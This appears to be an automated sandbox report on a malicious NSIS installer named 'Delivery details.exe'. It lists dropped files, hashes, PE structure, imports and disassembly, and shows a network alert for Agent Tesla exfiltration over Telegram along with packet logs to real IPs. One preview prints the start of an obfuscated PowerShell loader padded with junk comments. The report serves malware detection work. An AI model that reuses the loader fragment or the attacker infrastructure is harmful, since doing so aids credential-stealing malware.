Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\nst7F0C.tmp

Download File

Process:	C:\Users\user\Desktop\Delivery details.exe
File Type:	data
Category:	dropped
Size (bytes):	3437253
Entropy (8bit):	1.6911845390493845
Encrypted:	false
SSDEEP:	6144:/JuzfCNbqguFkdEOQowDvxVrpBkF5Lgzw9nuta04vbiexxSAbqRfW8Qyc1:/tEWY7lk9nuta00RxDYQ
MD5:	2EBBFCACB88669B23AE4163210EF2E60
SHA1:	4F63AAD55190DBDD06EB1BC3A481ABF8ADDCB0E2
SHA-256:	4AA631102B2326C3CF180ABC52F266144AFA15F30C514A2787A141E62F3989D2
SHA-512:	657B2E7E2424ECE2404E97432E87BFCB56079EB28D16EB1D1F0A1F3D218DC6F709FC450211820C2AC7426ADF96FEA35122D6EFD1957EB8E61CB9D2ECCD3CE099
Malicious:	false
Reputation:	low
Preview:	........,...................O...h...........................................a...............................................................................................................................................................................................................G...U...............j...............................................................................................................................................8.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\akroterion\archmugwump\Kbslaaende.Fri

Download File

Process:	C:\Users\user\Desktop\Delivery details.exe
File Type:	ASCII text, with very long lines (59516), with no line terminators
Category:	dropped
Size (bytes):	59516
Entropy (8bit):	5.36858597156236
Encrypted:	false
SSDEEP:	768:/FE5XVmMQd8p1X0d9a64PObehS9nXomSW6WLAbTa3GIYEbTqO6aXCXCFPSetuCPa:/F0XcMR1kdc6RxnSXwWJEbTqO9af9XH
MD5:	14B45BD37D696560C5E402D14CB01BBF
SHA1:	8B2F1E28EC706E65C1EB69BCB4DE24BF9CA8AD48
SHA-256:	4E59164AB4028378DC90281D6E9CCA86C3A02687692BC2E68509C18CB8753B4B
SHA-512:	CA9F5954EF908129DAB8EE939191753E55E56D4E38E1D40BCE3F87FACD6DA2C074F2FEB13EA309F2FDC27626FFA17D33107B85C170ECDC722E93728F1920C226
Malicious:	true
Reputation:	low
Preview:	$Virkningsgradwhirl=$Virkningsgradfgangsklassens;<#Decennaries eskalerende Fejltrins Karrys Jaguars Unnooked Ravnes #><#Fjong Kontraster Samfrdselen Unambition Fastlg Cowkine Bichromatic #><#Gennembagning Indskrumpen burgere #><#Proverbialize Personalekompensations Kultureksport Nationalliberalt Observatory Clubwoman Kappas #><#Hyaloliparite Topworked Strejfende Superextension Bvrede Lagerkapaciteters Pommies #><#Finoptller Shedman Confidentiality #><#devoices Platinous Silicam Reslated #><#Sofismes Spilleren Coz Icacinaceae Hyperaction #><#Blighty Fartovertrdelser Ecuelling Snigmorderen agaze Divinationer Spidsvinklens #><#Unsplayed Marmorated Farrant splining #><#Driftstabs Regnvandet Paaskebrygs #><#Diskbetegnelser Udflytningerne Libidins Assapanick Echapper #><#Ungainful Semifinish Jask Genopretninger Splenectomize #><#Gonoblast Expurgate Aeromedical #><#Flabet Betegnende Parcelling #><#Petered Driftsinventars Undispellable Buncal Roodle Holorhinal Lalapalooza #><#Stridskoelle Heli

C:\Users\user\AppData\Roaming\akroterion\archmugwump\Kraevet\Haematopoiesis\Depressingness.pan

Download File

Process:	C:\Users\user\Desktop\Delivery details.exe
File Type:	data
Category:	dropped
Size (bytes):	338566
Entropy (8bit):	0.5509473873754586
Encrypted:	false
SSDEEP:	768:am5bz9GowNFFjlSyJTs8nbdTeSPK8kJPwLyWZx+nj3PYaiJ1oGHgn:SIcx
MD5:	B58BC632700F045548A1E0904067982F
SHA1:	56AB0A059FD33822BBBCF17845AD75F5535930B6
SHA-256:	5A5656014CB2FCBFF61344E9B4C4A0C1FD444F7FAC4839661EECA6AE5076E376
SHA-512:	5AE688A739CD6D307B9DE0F740A07BF33F51981B86DB8B982D46D092DFF2D72BEFF3F1FCD0980E0490EDBB180E3A64FBFE0F1911B591459C156B57501C2EACFA
Malicious:	false
Preview:	.q...........................D...........................................................................%.............................8.....Z....................................................................................................................................................................L...........W.........................................................................................<..............................................................................................................S..................................}................................................................:....................................................................................x....................................................................................................U........>.........Q.......................................................................~.......................................................................................................

C:\Users\user\AppData\Roaming\akroterion\archmugwump\Kraevet\Haematopoiesis\Gynodioeciously.hjr

Download File

Process:	C:\Users\user\Desktop\Delivery details.exe
File Type:	data
Category:	dropped
Size (bytes):	605466
Entropy (8bit):	0.5576062731553693
Encrypted:	false
SSDEEP:	768:Y874cUOnHTenwIahjU3EODe9mAStHy3vCo0RCXqwUGvU+CbiWdL4KZCNmIaeHVly:wPxb8vf8
MD5:	FC23A1D590F2A1693F8779FE2FF38B9D
SHA1:	D852560A8A3F06A8FB933E50FF3AF17BCA4FF0EF
SHA-256:	590DA31E2E55A5E240A3CED27182A8940B1E4257DB52CEFE0CDC9C14351680BE
SHA-512:	1F1BC148ED3BBDB52788D1754610B50B2A7415D031F06147F21BB52F26E920B537FF586F956373CD71DF44215F28C05E02064E2AD23EF1DB539B453F6ABCDB38
Malicious:	false
Preview:	.............................E................................r...............................................................................................................................................,.......................................................o.................................................................................................................................................w...........................H................................................y........\...........;..........................................0....................................................................................................................................................8............................................................5.............................G..............w.....m...........................................................C..............................................................................................z..................................

C:\Users\user\AppData\Roaming\akroterion\archmugwump\Lndeles.Joh

Download File

Process:	C:\Users\user\Desktop\Delivery details.exe
File Type:	data
Category:	dropped
Size (bytes):	315833
Entropy (8bit):	7.745034101989874
Encrypted:	false
SSDEEP:	6144:XJuzfCNbqguFkdEOQowDvxVrpBkF5Lgzw9nuta04v1:XtEWY7lk9nuta001
MD5:	695DD16688651AC3DEEF1E45F1E83425
SHA1:	8132446C43294DA7507595CA1566010A802F7739
SHA-256:	5D3E471E51484C913B77169AA1448341F0741C35B8A6A84CA2B7A5027AF1EA0B
SHA-512:	498FCE7ADFBBEFA92B124ECA767619FDDA18B04D183AA2C2960A904B4F838C7DB527310308251341FDA8C6011CAE09E54E05AB401EEC80DE28CC66914446EC22
Malicious:	false
Preview:	...7............,...YY..............................[[[[..ZZ......GG..........44.......\......eeeee.d..............q.......::.\\.....77....BBBBB......J..\\...nnnn.......BB...i..........g...........V...........................EEEEE.]...X.....................'.b..{{........d..__..........................M.........VV.....z....e............................`.................._..................ii..............#..1111.g....DD....Z....................ll......;;....................................pp.................................nnn.....................JJJJJJJJJ......... ....c..................w.............................44.....................................EEE....i..\|\|\|.....(...HH.J.........ddd...........%%%........................%.........((..aa....../.............7..III...x...;..5555..........DDD.....NNNN.....HHH.......^.c.........................[.PPPP..:::.................&&.......ee...........................333.$.'.................'.........oo..............................tttttt

C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured\Delivery details.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	881136
Entropy (8bit):	7.575238020715874
Encrypted:	false
SSDEEP:	24576:OuQXWj3yekSs7HkSlb+4qTqBY9iMH2FXFZ/Qke:YHSs7Hkcb+pTl91Hipe
MD5:	78AC601A2F48BC5FC7C15EDB4C0FB9D7
SHA1:	43096A0AB5CC82736544F5F25FF01E523CE08C2D
SHA-256:	F5F07D56FB08266E8109ADE046A794451D86B2A3D32228EDE3C096FFE8CCA8CE
SHA-512:	71071CEB1608AB51E3742E3D48EED7834A1A077351E30EE9B2E193CF33506226523F99A7338A20BB219C68B31A32B14CF9DCD718D77EBD0670DDA5CE1EE41C57
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 13% Antivirus: Virustotal, Detection: 14%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....uY.................d...*.......4............@..................................r....@..............................................8..........(Y...............................................................................................text....c.......d.................. ..`.rdata...............h..............@..@.data...X............\|..............@....ndata...................................rsrc....8.......:..................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured\Delivery details.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured\Midlines.txt

Download File

Process:	C:\Users\user\Desktop\Delivery details.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	464
Entropy (8bit):	4.221211340885619
Encrypted:	false
SSDEEP:	12:qaC/J5SFKX6Xv9MLSrZpANkpY2A2EskVjpFxD4Sq/dNEHp8+:qzJEK9LSrZuNkpW+OKSudNEHpR
MD5:	BC56E08D19E6A0F6A565430579BC14BE
SHA1:	CD3CA1DDDA47A39A53A546300D5EC05A8BF7950C
SHA-256:	60E5DB53024A7462646673DCC4305AD18876C99A2E293C1DC1CFD274FE39195F
SHA-512:	B8D1F8BFCA4E3BCFDA79C7788E6ED2F2C65F15FA35E4F1B206264AEC5558B006A5F2A5687EC23B6719CEA8D5B970672703930F57B645DF1172463CD4BAD30D59
Malicious:	false
Preview:	startproduktion reeksporters penality.scanting beskyttelsesvrdiges angiotonic intramurally parallellens kremationer verrucated lazaroners documentizes skralden servante decreeing..sageness doceredes legitime gladii fejlens melanocerite ingreve..weki brnearbejdet opelsk burlesk indazin skivesneglene,arbejdsvgringen sprgere midterste havards milieustttelovgivningen glyceryl..trophothylax opalerne semifinalisternes sortkridtstegningerne gratiners nitrogenization.

C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured\brandmur.pha

Download File

Process:	C:\Users\user\Desktop\Delivery details.exe
File Type:	data
Category:	dropped
Size (bytes):	431707
Entropy (8bit):	0.5543824847888849
Encrypted:	false
SSDEEP:	768:X4bZ7B96xNrcaWrCdBsQF/QfhkCxkmH4YO2YdEW9Sp809BD0X2fRv7iXUj2HeHiZ:ccS
MD5:	B23758B8B767048DA446DA5E058DC195
SHA1:	31328C880608388BA3C75785065AD3DF43BC9661
SHA-256:	76EE475D57C663EE99CF7DE187BF505C9AC76059A387E4E11110BAC5ED803C6D
SHA-512:	63492A997F4AA27C17B70A22279F44CB90D7C7B7A65CACCB531FE6B1542EAC6F77E1EBDA335061BB72F7EAF98C1380AB2EE3C85E67CBDAF21EEA9BEBC0FD3625
Malicious:	false
Preview:	....................................................................x..................................O.................Q............................................................7..........................................................................................................................................................................2..................................................................................R........................................................................e.............................................................................................................................................................................................................................,.......................................................................................R..................R............................../..............................................................................}..............................A....................

C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured\nozzle.par

Download File

Process:	C:\Users\user\Desktop\Delivery details.exe
File Type:	GTA audio index data (SDT)
Category:	dropped
Size (bytes):	413152
Entropy (8bit):	0.5564660589901251
Encrypted:	false
SSDEEP:	768:wAQ/+s9asp+upgyId3QfO2jYNYSQqJEtbyN6zhGFJuhi1A8B7RuR4z:lai
MD5:	04FC86126129506141D8CB3E768BD17B
SHA1:	04BA5DC104CAB14256231D9C17E30DD427C46027
SHA-256:	D74CBB94C54CB9F9DF6E18A238C61477264EA2616339C9E511F89634DC8B40EA
SHA-512:	61847032A1614A7C4CE1FED0052524447B2F5CFC5A812D6D1A140AC88401338A299CE664CF286660AC645BCD7AFEE8196092CCC93FF139DE9FF72CE951FB7B8E
Malicious:	false
Preview:	.........X.........................................x....................................s..............................................................................................................D....................................................;...........................................x.................................................................................................$...........................................................................................................................................................&.........................................................................................................................*.....................................................................................................................................................................e..........................................................%..................................a...................................................................

C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured\padderne.cli

Download File

Process:	C:\Users\user\Desktop\Delivery details.exe
File Type:	data
Category:	dropped
Size (bytes):	758956
Entropy (8bit):	0.5507330731731235
Encrypted:	false
SSDEEP:	768:H1nvtnmC3h4fi6v2WJb6rGUDgqwIEYZq4XcQF5+EeEUYXCKdRtaPOKA7tkKNRqe7:7J/xRb/8JS1
MD5:	2F7CCF50A0474987EB154F19AF78073C
SHA1:	19E2AF2009D78694E0987AD36A3F5C7C6BCFFD8C
SHA-256:	8FE7CA276A423AE9E61EFC02130A86DBF345D0E17DCA2CA319E177E08043D0F2
SHA-512:	B6CEEF1EB6058EAD6EF9D662DC499A0CD36CB857318F825BF842ADF09B4A830BDA63CAE3769EA28C452B454542C5E7F3597D2CB217990B996F1394FB7F9152FB
Malicious:	false
Preview:	..................................................................................................................................B..............................0.....................................................................................................................................................................,................................................................Y....................................................................................................U.............r.......*.......c....V..4........................................1..................................................................................................................................................x................?........................................N.......................................................S..........................................R[G............................................................s............................................................

C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured\unwink.gua

Download File

Process:	C:\Users\user\Desktop\Delivery details.exe
File Type:	data
Category:	dropped
Size (bytes):	505457
Entropy (8bit):	0.5597672519627245
Encrypted:	false
SSDEEP:	768:I4TZoaDeuAh3UrnmfcTVY7kTVIGWI6CEwMgjxy/q1DysCK9wT/Jv/tVYCKcANoQb:/QEZWbPP+Y+T
MD5:	CA7667CCF34A9433457AC2AD5075ADCC
SHA1:	17BE9093FA552591B2BD33491A009325A1B4697C
SHA-256:	6339E90A7C46436334E331186EC23558B92894E8FEF2D0B08CA59B0639A43E7F
SHA-512:	2ABA5D0CE01628F97C8229F258D599D40A4DC4BB07E300E6734BDE066B234B9780E787E2261C9DB34D14CF4280AEDCDE3B64200AE1BDE95E4CE29E404DD52BA1
Malicious:	false
Preview:	.........................................S............................................................^..............................................................................................................................................................................................[...............3..............................o...........n........................................................................................e..........................................................J...................................................................................._..............................................................[..%.....................5.............................................J.....................................................................................................................................................................................v.....................c.............$..............................................N...............

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.575238020715874
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Delivery details.exe
File size:	881'136 bytes
MD5:	78ac601a2f48bc5fc7c15edb4c0fb9d7
SHA1:	43096a0ab5cc82736544f5f25ff01e523ce08c2d
SHA256:	f5f07d56fb08266e8109ade046a794451d86b2a3d32228ede3c096ffe8cca8ce
SHA512:	71071ceb1608ab51e3742e3d48eed7834a1a077351e30ee9b2e193cf33506226523f99a7338a20bb219c68b31a32b14cf9dcd718d77ebd0670dda5ce1ee41c57
SSDEEP:	24576:OuQXWj3yekSs7HkSlb+4qTqBY9iMH2FXFZ/Qke:YHSs7Hkcb+pTl91Hipe
TLSH:	CD150142BD43C265E86C1B31A82A9C150263BD15BD747B1FEBC8B339FBF32925426617
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....uY.................d...*.....

File Icon


Icon Hash:	031015b73c6c613f

Static PE Info

General

Entrypoint:	0x403489
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5975952E [Mon Jul 24 06:35:26 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	1f23f452093b5c1ff091a2f9fb4fa3e9

Authenticode Signature

Signature Valid:	false
Signature Issuer:	E=paasyninger@Brndvidde.Apo, O=Gadekasernen, OU="Unrewarding Routemen Teutonisk ", CN=Gadekasernen, L=Aignes-et-Puyp\xe9roux, S=Nouvelle-Aquitaine, C=FR
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	22/04/2023 12:26:37 21/04/2026 12:26:37
Subject Chain	E=paasyninger@Brndvidde.Apo, O=Gadekasernen, OU="Unrewarding Routemen Teutonisk ", CN=Gadekasernen, L=Aignes-et-Puyp\xe9roux, S=Nouvelle-Aquitaine, C=FR
Version:	3
Thumbprint MD5:	3B6DE0B5E8C5083A0CE753D1E1F3BB65
Thumbprint SHA-1:	BDCE2713ED170F044ABD00E55F4BC766D3BD33CE
Thumbprint SHA-256:	97A3116B555800596CF31CE425623F190AB489B92BEFBDD412FEE5B4AC31D74A
Serial:	081DEF4D4B09A6DC4F14BE0CCB12B8432F7C65B9

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A230h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080ACh]
call dword ptr [004080A8h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042A24Ch], eax
je 00007FB2494E9E43h
push ebx
call 00007FB2494ED0F1h
cmp eax, ebx
je 00007FB2494E9E39h
push 00000C00h
call eax
mov esi, 004082B0h
push esi
call 00007FB2494ED06Bh
push esi
call dword ptr [00408150h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007FB2494E9E1Ch
push 0000000Ah
call 00007FB2494ED0C4h
push 00000008h
call 00007FB2494ED0BDh
push 00000006h
mov dword ptr [0042A244h], eax
call 00007FB2494ED0B1h
cmp eax, ebx
je 00007FB2494E9E41h
push 0000001Eh
call eax
test eax, eax
je 00007FB2494E9E39h
or byte ptr [0042A24Fh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [004082A0h]
mov dword ptr [0042A318h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 004216E8h
call dword ptr [00408188h]
push 0040A384h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x84fc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4a000	0x43818	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xd5928	0x18c8
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x63d1	0x6400	139645791b76bd6f7b8c4472edbbdfe5	False	0.66515625	data	6.479451209065	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x138e	0x1400	007eff248f0493620a3fd3f7cadc755b	False	0.45	data	5.143831732151552	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x20358	0x600	ec5bcec782f43a3fb7e8dfbe0d0db4db	False	0.501953125	data	4.000739070159718	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2b000	0x1f000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x4a000	0x43818	0x43a00	465e5069e0b692b94fe578bd3b9cf0fc	False	0.6225847677911276	data	6.02785655832943	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x4a3b8	0x14bf0	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9995763509696856
RT_ICON	0x5efa8	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.4252632201585236
RT_ICON	0x6f7d0	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.4607157872608787
RT_ICON	0x78c78	0x67e8	Device independent bitmap graphic, 80 x 160 x 32, image size 26560	English	United States	0.46921052631578947
RT_ICON	0x7f460	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.4803142329020333
RT_ICON	0x848e8	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.4802786962683042
RT_ICON	0x88b10	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.5267634854771784
RT_ICON	0x8b0b8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.5710600375234521
RT_ICON	0x8c160	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.6319672131147541
RT_ICON	0x8cae8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6950354609929078
RT_DIALOG	0x8cf50	0x100	data	English	United States	0.5234375
RT_DIALOG	0x8d050	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x8d170	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x8d238	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x8d298	0x92	Targa image data - Map 32 x 19440 x 1 +1	English	United States	0.7191780821917808
RT_VERSION	0x8d330	0x1a8	data	English	United States	0.5283018867924528
RT_MANIFEST	0x8d4d8	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
KERNEL32.dll	ExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
03/15/24-12:36:34.108520	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49716	443	192.168.2.5	149.154.167.220

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 15, 2024 12:36:26.495663881 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:26.495693922 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:26.495764017 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:26.505435944 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:26.505449057 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:26.834146023 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:26.834222078 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:26.920224905 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:26.920238018 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:26.920514107 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:26.920576096 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:26.923532009 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:26.964282990 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:27.143302917 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:27.143328905 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:27.143416882 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:27.143429995 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:27.143477917 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:27.299787998 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:27.299880981 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:27.300225019 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:27.300457954 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:27.300605059 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:27.300681114 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:27.345750093 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:27.345817089 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:27.456708908 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:27.456779003 CET	49714	443	192.168.2.5	162.240.109.7
